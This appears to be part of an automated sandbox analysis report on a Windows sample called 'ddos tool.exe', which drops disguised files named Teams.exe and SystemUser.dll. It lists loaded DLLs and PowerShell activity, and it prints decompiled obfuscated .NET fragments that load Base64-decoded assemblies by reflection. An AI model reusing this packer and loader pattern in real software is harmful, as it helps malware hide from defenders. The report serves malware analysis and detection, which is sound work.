                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dllSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: twinui.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: powrprof.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: dwmapi.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: pdh.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: umpdc.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: onecorecommonproxystub.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: actxprxy.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.appdefaults.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.immersive.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: uiautomationcore.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: dui70.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: duser.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: dwrite.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: bcp47mrm.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: uianimation.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d11.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: dxgi.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: resourcepolicyclient.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: dxcore.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: dcomp.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: oleacc.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: edputil.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: windowmanagementapi.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: textinputframework.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: inputhost.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: windowscodecs.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: thumbcache.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: apphelp.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: appresolver.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: bcp47langs.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: slc.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: sppc.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: tiledatarepository.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: staterepository.core.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepository.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: wtsapi32.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepositoryps.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepositorycore.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: mrmcorer.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: appxdeploymentclient.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: sxs.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: directmanipulation.dll
                  Source: C:\Windows\System32\OpenWith.exeSection loaded: textshaping.dll
                  Source: C:\Users\user\Desktop\ddos tool.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                  Source: SystemUser.lnk.4.drLNK file: ..\..\..\..\..\..\Local\Temp\SystemUser.dll
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\ddos tool.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: ddos tool.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: ddos tool.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                  Data Obfuscation

                  barindex
                  .NET source code contains method to dynamically call methods (often used by packers)
                  Source: Teams.exe.0.dr, ML451EmqZtauGOpkV4NJKHm5nWW.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{s1MhsrOLB5mc80PR91Fpe1uMDZbYtBuQPSgUOXHI8R.z95iHfibRjEW3cnUGJX7lgucbNKLHURg2uN3NMWzxH,s1MhsrOLB5mc80PR91Fpe1uMDZbYtBuQPSgUOXHI8R.zk0FuiLuUQnqLGsOiApWCHV4i0pAKBO988SJpOl3Y6,s1MhsrOLB5mc80PR91Fpe1uMDZbYtBuQPSgUOXHI8R.QPvQV5yM0Ap89XkYr0jgu7krTB69sL9EJ5cXJCRxoS,s1MhsrOLB5mc80PR91Fpe1uMDZbYtBuQPSgUOXHI8R.VdxlzD5n3uu9syZbqANeQlHKtCXFz88HA8OXkivWYf,bimUsjvre7ZstFKFZOMuKgeRCCJ.SAEpbfkTQx71ghdClo2I6do2y29()}}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: Teams.exe.0.dr, ML451EmqZtauGOpkV4NJKHm5nWW.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{_2KfHtSHo5Dqy07ACyWDfO3VOWd1[2],bimUsjvre7ZstFKFZOMuKgeRCCJ.R6mGLWJsAps2oDEInIOIjxI6UlT(Convert.FromBase64String(_2KfHtSHo5Dqy07ACyWDfO3VOWd1[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: SystemUser.dll.4.dr, ML451EmqZtauGOpkV4NJKHm5nWW.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{s1MhsrOLB5mc80PR91Fpe1uMDZbYtBuQPSgUOXHI8R.z95iHfibRjEW3cnUGJX7lgucbNKLHURg2uN3NMWzxH,s1MhsrOLB5mc80PR91Fpe1uMDZbYtBuQPSgUOXHI8R.zk0FuiLuUQnqLGsOiApWCHV4i0pAKBO988SJpOl3Y6,s1MhsrOLB5mc80PR91Fpe1uMDZbYtBuQPSgUOXHI8R.QPvQV5yM0Ap89XkYr0jgu7krTB69sL9EJ5cXJCRxoS,s1MhsrOLB5mc80PR91Fpe1uMDZbYtBuQPSgUOXHI8R.VdxlzD5n3uu9syZbqANeQlHKtCXFz88HA8OXkivWYf,bimUsjvre7ZstFKFZOMuKgeRCCJ.SAEpbfkTQx71ghdClo2I6do2y29()}}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: SystemUser.dll.4.dr, ML451EmqZtauGOpkV4NJKHm5nWW.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{_2KfHtSHo5Dqy07ACyWDfO3VOWd1[2],bimUsjvre7ZstFKFZOMuKgeRCCJ.R6mGLWJsAps2oDEInIOIjxI6UlT(Convert.FromBase64String(_2KfHtSHo5Dqy07ACyWDfO3VOWd1[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                  .NET source code contains potential unpacker
                  Source: Teams.exe.0.dr, ML451EmqZtauGOpkV4NJKHm5nWW.cs.Net Code: PpKwk4ZD0OBGSX1cCYfjUdTYHeB System.AppDomain.Load(byte[])
                  Source: Teams.exe.0.dr, ML451EmqZtauGOpkV4NJKHm5nWW.cs.Net Code: HZOt5lNJSmb1JSWoPsC5mnZgbni System.AppDomain.Load(byte[])
                  Source: Teams.exe.0.dr, ML451EmqZtauGOpkV4NJKHm5nWW.cs.Net Code: HZOt5lNJSmb1JSWoPsC5mnZgbni
                  Source: SystemUser.dll.4.dr, ML451EmqZtauGOpkV4NJKHm5nWW.cs.Net Code: PpKwk4ZD0OBGSX1cCYfjUdTYHeB System.AppDomain.Load(byte[])
                  Source: SystemUser.dll.4.dr, ML451EmqZtauGOpkV4NJKHm5nWW.cs.Net Code: HZOt5lNJSmb1JSWoPsC5mnZgbni System.AppDomain.Load(byte[])
                  Source: SystemUser.dll.4.dr, ML451EmqZtauGOpkV4NJKHm5nWW.cs.Net Code: HZOt5lNJSmb1JSWoPsC5mnZgbni
                  Source: C:\Users\user\Desktop\ddos tool.exeCode function: 0_2_00007FF848E600BD pushad ; iretd 0_2_00007FF848E600C1
                  Source: C:\Users\user\AppData\Local\Temp\Teams.exeCode function: 4_2_00007FF848E700BD pushad ; iretd 4_2_00007FF848E700C1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848D5D2A5 pushad ; iretd 5_2_00007FF848D5D2A6
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848E700BD pushad ; iretd 5_2_00007FF848E700C1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848F40835 pushfd ; retf 5_2_00007FF848F40837
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848F42316 push 8B485F93h; iretd 5_2_00007FF848F4231B
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848F42185 pushfd ; retf 5_2_00007FF848F42187
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF848D4D2A5 pushad ; iretd 8_2_00007FF848D4D2A6
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF848E600BD pushad ; iretd 8_2_00007FF848E600C1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF848F30835 pushfd ; retf 8_2_00007FF848F30837
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF848F32316 push 8B485F94h; iretd 8_2_00007FF848F3231B
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF848D4D2A5 pushad ; iretd 11_2_00007FF848D4D2A6
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF848E600BD pushad ; iretd 11_2_00007FF848E600C1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF848F32316 push 8B485F94h; iretd 11_2_00007FF848F3231B
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF848F30835 pushfd ; retf 11_2_00007FF848F30837
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF848F32185 pushfd ; retf 11_2_00007FF848F32187
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF848F383B8 pushad ; iretd 11_2_00007FF848F383B9
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FF848D5D2A5 pushad ; iretd 13_2_00007FF848D5D2A6
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FF848E700BD pushad ; iretd 13_2_00007FF848E700C1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FF848F42316 push 8B485F93h; iretd 13_2_00007FF848F4231B
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FF848F40835 pushfd ; retf 13_2_00007FF848F40837
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00007FF848F42185 pushfd ; retf 13_2_00007FF848F42187
                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dllCode function: 18_2_00007FF848E700BD pushad ; iretd 18_2_00007FF848E700C1
                  Source: C:\Users\user\AppData\Local\Temp\SystemUser.dllCode function: 21_2_00007FF848E600BD pushad ; iretd 21_2_00007FF848E600C1
                  Source: ddos tool.exeStatic PE information: section name: .text entropy: 7.716429359319973
                  Source: ddos tool.exe, XCzpg27Fsi7z0fee4sAiaLAV.csHigh entropy of concatenated method names: '_7CJsqZOtcZDqsGalvlLIkfHB', '_5ocON0H7412KuUbAnYRaAAWi', 'N8kRvJ56EuOo3Stnrk8JPaZN', 'z1N38CKm1UOmQjlq0DgVzrW4', 'E0vSvRKLEMHbiLdezL28Yv1G', '_17hGc1wCr2tZbp6WwbdF8BqX', 'EJYh8thxR0jZ0FqQePbplajV', '_2EYgS8d2hMwFcjTBRyAcyxxb', 'D0f0FALKiHsjTSRdoI0UJn7s', 'ULLBp9kGpclWGe2mUv5n24dZ'
                  Source: ddos tool.exe, UOHpTPYL40J9da7VOQ5y2H4DUTKG2pPDmEWcKq6ddeqiVzYB36CET3yRKiaJgG2Txvx8AsZmLklKR8MdgU.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'dEgNWDV9oxjhUUoLdo0Lgppu', 'jPuEhvC0k7Ax0AaForm1XB6c', 'YxGbjIP2m62lEPAaU5zmgN1I', 'cw268ZxtPtawtIUlN9Ok9GIy'
                  Source: Teams.exe.0.dr, mWM4La47DtVTKQSBmg6IS9RKyA1.csHigh entropy of concatenated method names: '_2mzMcA8TZy5V8ByWUcrytuViIkG', 'gXF554oMF6IeegogZrEoPzQM8IM', 'XeyGendWumVAfyi7o83OnaihWAC', 'tcWPJUC0ocCOhJE72tV', 'y96JNevB4IswUS3EBIh', 'p2r0RBrpDVK7i4FEEwG', 'JdpCvPuzOdgr2NWrP4L', 'ezdLLUGSRNmP7kCbRPv', 'BYIYmY3x9yHmyemOSyi', '_5hy7Gj4ZF8KNOZZ1bM9'
                  Source: Teams.exe.0.dr, s1MhsrOLB5mc80PR91Fpe1uMDZbYtBuQPSgUOXHI8R.csHigh entropy of concatenated method names: 'WLeCVhZiau8op4iIqsmOnOWNUOsyhXX5s7wgHgg70OVmbxPsO0cKnsXlo39', 'wsAIrajwYkcPs5kjdKGwwStHT17JpecTZ14uLo8K7i1aJCwX9mTT0vSHB8f', '_20NP3lD9YYhL4HZQL71AqUqQzoSVYlO8LGfOY4y424QOSuEeHDr15CZMeBc', 'YR4gZbdE3pViSviavPQUSwxpMREmNXuWZPdq24ylwbvWTDZtBCIayem2j3k'
                  Source: Teams.exe.0.dr, FVnSkZ44OF9pOTBjFXHsh4mXS9N7XMsQ9y1MNjYQes.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'EqYUMJmwRBF7Pu2zoiNVPFGVGjz1PAafWamIGu8oA2JIOoDmcPWU4guvyIN', 'kq74fILC25mKddHEiYFSIO7EgLylTOhwsC0WArStBBXI75pUSbHwPxZ6e9m', 'vAseT74ALHZEkY24JXCz4px23CsdTiUlkjYtSsirTeBBYHhtetYwuaXGYZ9', 'isBAI4tqQ7wfMdYJzFM6A2Z2l43MD4Ql0HYhEq0yosD82KPHnHdywgyAXi4'
                  Source: Teams.exe.0.dr, Ior8uDO9Bk6c8N4xxlbBxlE0nwuQDbeIqAFHPz0Apy.csHigh entropy of concatenated method names: 'uICZBYUT4tAKJYYxI1dBJqQm7cZoHGqzzqOYn0iuiQ', 'hfeJv90l182VNe01eMKdgpw4pHH9sLesZwqSkTkELl', 'BkwOwm0ftsV4pfQwXCAKvOAR6uisrXH6TD8u0ATd5q', 'VI2QxrMnRAs0FTh1DnvelOLuJNb24vYIt5wg9qon3C', 'KBdyCBPfmAO9QnCYxHVpKipe3HkM2SGh0Nlwvbl8MQ', 'UooeahBOEzOt5XKFDcXUEYdOZyyUuLBrwXCDoMzT7r', '_5VuBPpkcqLZ6I9p7faj4LSc0tlpnA2JP6Ckqe9mGW6', 'V2SHVwt2DqJ2cMd2rdEBlZsNZVcmjnuq0R65LPVDdF', 'Rnnsvgr5EGYX2tqcmWMGEeIQvxjbhEEnQWAX9rybJV', 'x3c2zYG0r4K9f6ekBtoKQCxc1oNPKz6T6xMsLVRZeI'
                  Source: Teams.exe.0.dr, M2XV29eR6jcgwA78ZebgeWlObVr.csHigh entropy of concatenated method names: 'HTMnyk4p0Cd2izKRn4M8mkHiFcv', 'VkYmYLByrApzc8Gnxlu3kk2aijYx7lS0EufSgDz0rpdwXw9e9TJKnsW9M7ur2Whlvu1FFAYTWwvSa66W3P9NqIWjCj8J', 'y5hseydkB6F3Ijh0zDwZmtH4aFIS8sE8mV2rH4rLUQiteO24JCnaVXEPRMjugZ1gxbqkdrkGP5Mu76RPB7mvfsbXvVVt', 'c1unlfQ7m09ZO4L6zFRJ2gw75zTwvGX1XErZLVWisp2E9RaeUA2DJiF2ikrzjycZcOupFXCUjg1MrMJox9vXoTWEkLtb', 'AqZLz9gFH2pEcG6Zpxfgjhput8eMZfvn5VgEbOqpWuHkMulfBDm2yJkI86Cvr08x6JnK1uniksZ7ny1PrzzVYcXLeR00'
                  Source: Teams.exe.0.dr, 2gy0IgnybQzeeSdKDb084tp8kmjQf8cSHPMg969bNh.csHigh entropy of concatenated method names: '_7oO3GpHs1VV0J17WpflFGlAzKdS4GBZMX5ouiopZG4', 'aTGK8tjI3VvbFnyK6BLd71r9PD9n1JxPkddo1uDrwH', 'SEjqEW1o0LhztOv3SiIfRQYbMAPkmSBJGdLLbj9bwp', '_7ImyRyQy5cjMQSRqiM6E4dVeXmv9wNL9SaQIImK3NG', '_1Ns23ZiOUWJwssd9ybPd0NOgDbGFq661ukCnFWiXOy', '_8UJEpN1HRp22YaipPkhCldftPm3ghnU0PJwU8xHkDb', 'kbZpv9uF06E0ru2KuUMWXjkFUsZdgfhJwlUBe7aMhU', 'xtff1nSyuoSKg04iD1SlMzigGrRO6fsJpIgoKpoS4N', '_9bB1EPICqhRLkRynxvJLUVJ2s1bBUyoSmVoQo4LMs8', 'g60MY7QyDcTyDa8nzAbTSTOj77FZcTBjRQpFJxS3zH'
                  Source: Teams.exe.0.dr, ML451EmqZtauGOpkV4NJKHm5nWW.csHigh entropy of concatenated method names: 'DJpyrLQk4TuP92oI1m7n9B6d8yq', 'PpKwk4ZD0OBGSX1cCYfjUdTYHeB', 'WBX10yheUy3ZuJmkRCoDhjUH9g2', 'DfDYoRJxAO4sRy0Ls9SIe84XfeG', 'odxKzvz9CN5c5uBB2mydCXXt6Tw', 'Fh0hreiOfIRBoc73Od7RcGRZ5A7', 'wG5AI3pr0sH1c79DNiFCQZOwTk7', 'xaT1RR1IUgeAssUq93B1FZRBLtp', 'LjqzSD9T6dBswM2F3XuDFsJOJsA', 'iBmYkVFIGsDiwaQGaBNsRCMJo4y'
                  Source: Teams.exe.0.dr, RDx4hRwz6aSzmOHct93qaa3Naoe.csHigh entropy of concatenated method names: 'CqGUhGSbrCIE9Esu89R8rYgTpcU', 'SkipBpPZfd1xV3OZErwu4Mr6noM1foNLFBqImRZ4I6XWgiDEz5jcGq1GfQ5inBDI7xx5jK6WA1BYQ', 'js755ZKKjysegVUes7hNGQ8HGIgqycGjyFkCaEBMcNDPeSglAt3uXL7fcfV87uGhLOcMycOPyILOs', 'jDNPWHzT0lD8QucZ8O66JeriCrKRPCP77EHQYDD5C5pgg80AtObOjfy2Plj61s2iN0IMsHY7qm8Yg', 'Q548l6LtkyxQ2KHSgIMU28edHO6Gji26ijkAampAgK4wrHyabzFtVjMkwcETCT0U8bS16ZtJcE18I'
                  Source: Teams.exe.0.dr, bimUsjvre7ZstFKFZOMuKgeRCCJ.csHigh entropy of concatenated method names: 'KB1plCzwm5KSWB8g4bh5cAff4n3', 'iIWQSUlfQQwGQXan1MCDzc7qMej', 'OxSs7BqUzFcG8WIyBGVqhGk8mso', 'esEOB5TIESqbXzIRmqnq3e6BBZa', 'EAwWnFu6LX84Rf8FrwPqDRj5PQl', 'jLlADAHUkcwH4IBgtudCS7YNHNs', 'smJiKMnLt1J4961qnN5v4bmlbcX', 'toxqodopMsWrYL8wMW22lPxDhnS', 'jw6tCoCULQDD1144TMZijzhRifk', 'Ziuxsoia4sfBhtvKSTc8bj7qlNR'
                  Source: Teams.exe.0.dr, jEcc1xMdqIs4N262dHV4lOuG2YH.csHigh entropy of concatenated method names: 'fFtjXHpU60Sk6HD1weHC3X4uxYo', 'GOPUxmLbK1VVJ5jMuE6BxFMDM3l', 'dfQLLoaTTklM9jGX0aXmFCksBnB', '_7iCewZid5Uei6ZAHs0OdeJJv3jH', 'Bqtt9mffMPevUKRHeZqQzbez3WRaMHhFEavgQJIIxlLmEws3J1dSGK2uNfrZY0LmvD1OxrYbfviZZ', 'lQwLd9yy5oz2WXULcXtzzHLW8njJ2DEUB57qot06NnYuiDe1IOapRTlOEi9GZeMC9aGegfpeRel4j', '_5Fp4RFESDlkuBl6PLQL5prXbQmz35cQBz2RVpObslMWvSHl7SlBo2NyPQbtF54EQfgcr4OPplH4AO', 'nob02yMFYfS5RwC2UyQEbIyxNR42kqadjFuTspUXaNHS5MmZeoauUODDUnPjBBFqbdZuYPuSyqvYo', 'ST07Ax4jGlc6s9PI4ciJaOqd9dlCNvvSeHnY9UM9IccVLz9OdFRl4BekQ4SHSXMvhZafuNB0bxn7w', 'NGpg3JT62UXMvKIocSeS7aKwajQ8cCzODW9At2oRl7ouGEe5lqqiH6Cof4qBTMj10vdBcFaSTXAOp'
                  Source: Teams.exe.0.dr, 4CfOXREK3ocXQ3Rlng65ZiKxcuc.csHigh entropy of concatenated method names: 'yg9ZOdTjxdnJOd6T33FwPxWgqnN', 'exOPlnKW0tLQS3bZQVINnPDURUu', 'kwt1IQMiCp6SsJFpQqgbVNvxjyP', 'r1OYVxUh6YNVuPTNv21TxDUPxIs', 'dQaNekLtVOXMZiUBPlpWEZAlj6I', '_3JT7XhG1ORVYD6J72Y4QmaWBa7k', 'f2SxCiMl4v0i4fjePuUzDZdfcwP', 'ufBKBgJ5dnpWZXO3u4WHw6N1dt3', 'Atw9N4fhdP6QpWm4vmvNJcph5t4', 'jTh4AVok95ugDIw3pDbpPRPbvEI'
                  Source: SystemUser.dll.4.dr, mWM4La47DtVTKQSBmg6IS9RKyA1.csHigh entropy of concatenated method names: '_2mzMcA8TZy5V8ByWUcrytuViIkG', 'gXF554oMF6IeegogZrEoPzQM8IM', 'XeyGendWumVAfyi7o83OnaihWAC', 'tcWPJUC0ocCOhJE72tV', 'y96JNevB4IswUS3EBIh', 'p2r0RBrpDVK7i4FEEwG', 'JdpCvPuzOdgr2NWrP4L', 'ezdLLUGSRNmP7kCbRPv', 'BYIYmY3x9yHmyemOSyi', '_5hy7Gj4ZF8KNOZZ1bM9'
                  Source: SystemUser.dll.4.dr, s1MhsrOLB5mc80PR91Fpe1uMDZbYtBuQPSgUOXHI8R.csHigh entropy of concatenated method names: 'WLeCVhZiau8op4iIqsmOnOWNUOsyhXX5s7wgHgg70OVmbxPsO0cKnsXlo39', 'wsAIrajwYkcPs5kjdKGwwStHT17JpecTZ14uLo8K7i1aJCwX9mTT0vSHB8f', '_20NP3lD9YYhL4HZQL71AqUqQzoSVYlO8LGfOY4y424QOSuEeHDr15CZMeBc', 'YR4gZbdE3pViSviavPQUSwxpMREmNXuWZPdq24ylwbvWTDZtBCIayem2j3k'
                  Source: SystemUser.dll.4.dr, FVnSkZ44OF9pOTBjFXHsh4mXS9N7XMsQ9y1MNjYQes.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'EqYUMJmwRBF7Pu2zoiNVPFGVGjz1PAafWamIGu8oA2JIOoDmcPWU4guvyIN', 'kq74fILC25mKddHEiYFSIO7EgLylTOhwsC0WArStBBXI75pUSbHwPxZ6e9m', 'vAseT74ALHZEkY24JXCz4px23CsdTiUlkjYtSsirTeBBYHhtetYwuaXGYZ9', 'isBAI4tqQ7wfMdYJzFM6A2Z2l43MD4Ql0HYhEq0yosD82KPHnHdywgyAXi4'
                  Source: SystemUser.dll.4.dr, Ior8uDO9Bk6c8N4xxlbBxlE0nwuQDbeIqAFHPz0Apy.csHigh entropy of concatenated method names: 'uICZBYUT4tAKJYYxI1dBJqQm7cZoHGqzzqOYn0iuiQ', 'hfeJv90l182VNe01eMKdgpw4pHH9sLesZwqSkTkELl', 'BkwOwm0ftsV4pfQwXCAKvOAR6uisrXH6TD8u0ATd5q', 'VI2QxrMnRAs0FTh1DnvelOLuJNb24vYIt5wg9qon3C', 'KBdyCBPfmAO9QnCYxHVpKipe3HkM2SGh0Nlwvbl8MQ', 'UooeahBOEzOt5XKFDcXUEYdOZyyUuLBrwXCDoMzT7r', '_5VuBPpkcqLZ6I9p7faj4LSc0tlpnA2JP6Ckqe9mGW6', 'V2SHVwt2DqJ2cMd2rdEBlZsNZVcmjnuq0R65LPVDdF', 'Rnnsvgr5EGYX2tqcmWMGEeIQvxjbhEEnQWAX9rybJV', 'x3c2zYG0r4K9f6ekBtoKQCxc1oNPKz6T6xMsLVRZeI'
                  Source: SystemUser.dll.4.dr, M2XV29eR6jcgwA78ZebgeWlObVr.csHigh entropy of concatenated method names: 'HTMnyk4p0Cd2izKRn4M8mkHiFcv', 'VkYmYLByrApzc8Gnxlu3kk2aijYx7lS0EufSgDz0rpdwXw9e9TJKnsW9M7ur2Whlvu1FFAYTWwvSa66W3P9NqIWjCj8J', 'y5hseydkB6F3Ijh0zDwZmtH4aFIS8sE8mV2rH4rLUQiteO24JCnaVXEPRMjugZ1gxbqkdrkGP5Mu76RPB7mvfsbXvVVt', 'c1unlfQ7m09ZO4L6zFRJ2gw75zTwvGX1XErZLVWisp2E9RaeUA2DJiF2ikrzjycZcOupFXCUjg1MrMJox9vXoTWEkLtb', 'AqZLz9gFH2pEcG6Zpxfgjhput8eMZfvn5VgEbOqpWuHkMulfBDm2yJkI86Cvr08x6JnK1uniksZ7ny1PrzzVYcXLeR00'
                  Source: SystemUser.dll.4.dr, 2gy0IgnybQzeeSdKDb084tp8kmjQf8cSHPMg969bNh.csHigh entropy of concatenated method names: '_7oO3GpHs1VV0J17WpflFGlAzKdS4GBZMX5ouiopZG4', 'aTGK8tjI3VvbFnyK6BLd71r9PD9n1JxPkddo1uDrwH', 'SEjqEW1o0LhztOv3SiIfRQYbMAPkmSBJGdLLbj9bwp', '_7ImyRyQy5cjMQSRqiM6E4dVeXmv9wNL9SaQIImK3NG', '_1Ns23ZiOUWJwssd9ybPd0NOgDbGFq661ukCnFWiXOy', '_8UJEpN1HRp22YaipPkhCldftPm3ghnU0PJwU8xHkDb', 'kbZpv9uF06E0ru2KuUMWXjkFUsZdgfhJwlUBe7aMhU', 'xtff1nSyuoSKg04iD1SlMzigGrRO6fsJpIgoKpoS4N', '_9bB1EPICqhRLkRynxvJLUVJ2s1bBUyoSmVoQo4LMs8', 'g60MY7QyDcTyDa8nzAbTSTOj77FZcTBjRQpFJxS3zH'
                  Source: SystemUser.dll.4.dr, ML451EmqZtauGOpkV4NJKHm5nWW.csHigh entropy of concatenated method names: 'DJpyrLQk4TuP92oI1m7n9B6d8yq', 'PpKwk4ZD0OBGSX1cCYfjUdTYHeB', 'WBX10yheUy3ZuJmkRCoDhjUH9g2', 'DfDYoRJxAO4sRy0Ls9SIe84XfeG', 'odxKzvz9CN5c5uBB2mydCXXt6Tw', 'Fh0hreiOfIRBoc73Od7RcGRZ5A7', 'wG5AI3pr0sH1c79DNiFCQZOwTk7', 'xaT1RR1IUgeAssUq93B1FZRBLtp', 'LjqzSD9T6dBswM2F3XuDFsJOJsA', 'iBmYkVFIGsDiwaQGaBNsRCMJo4y'
